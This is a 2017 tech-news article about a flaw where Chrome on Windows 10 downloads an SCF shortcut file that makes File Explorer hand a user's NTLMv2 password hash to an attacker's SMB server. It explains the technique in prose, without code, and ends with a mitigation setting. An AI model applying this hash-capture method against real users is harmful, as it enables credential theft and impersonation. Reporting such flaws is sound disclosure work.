Share this article

Latest news

With KB5043178 to Release Preview Channel, Microsoft advises Windows 11 users to plug in when the battery is low

Copilot in Outlook will generate personalized themes for you to customize the app

Microsoft will raise the price of its 365 Suite to include AI capabilities

Death Stranding Director’s Cut is now Xbox X|S at a huge discount

Outlook will let users create custom account icons so they can tell their accounts apart easier

Hackers could use Chrome on Windows 10 to steal passwords – Google is working on a fix

3 min. read

Published onMay 17, 2017

published onMay 17, 2017

Share this article

Read our disclosure page to find out how can you help Windows Report sustain the editorial teamRead more

Given therecent Google discovery of a flaw in Windows Defender, and theGoogle discovery of a flaw in Internet Explorer and Edge, it would appear that Google and Microsoft aren’t exactly friendly when it comes to working together. This time, however, a new flaw has been discovered which could perhaps have both tech giants to blame, as hackers can exploit the flaw so they could use Chrome in Windows 10 to steal passwords (via ZDNet)

While Google has saidit is working on a fix for this flaw, DefenseCode security researcher Bosko Stankovicrecently detailed howthe flaw could trick the latest version of Chrome in Windows 10 into downloading a SCF file (show desktop icon shortcut) that can trick Windows (and help hackers) into capturing a user’s LAN Manager (NTLMv2) password hash.

Once downloaded, the request is triggeredthe very moment the download directory is openedin Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable).There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon“.The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password.

Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources.

The primary use case of this flaw is the way in which Chrome and Windows handle SCF files. Chrome does not label these types of files as malicious and does not scan these files for malicious intent, and Chrome relies on the default Windows settings once the file is downloaded. Because of this, the user does not even need to click or open the file, and Windows Explorer will automacially try to retrieve the icon when the user goes into the download directory, causing the capturing of the LAN Manager (NTLMv2) password hash.

To protect yourself, it is recommended for you to go to Settings> Show advanced settings> and Check the “Ask where to save each file before downloading” option.

Radu Tyrsina

Radu Tyrsina has been a Windows fan ever since he got his first PC, a Pentium III (a monster at that time).

For most of the kids of his age, the Internet was an amazing way to play and communicate with others, but he was deeply impressed by the flow of information and how easily you can find anything on the web.

Prior to founding Windows Report, this particular curiosity about digital content enabled him to grow a number of sites that helped hundreds of millions reach faster the answer they’re looking for.

User forum

0 messages

Sort by:LatestOldestMost Votes

Comment*

Name*

Email*

Commenting as.Not you?

Save information for future comments

Comment

Δ

Radu Tyrsina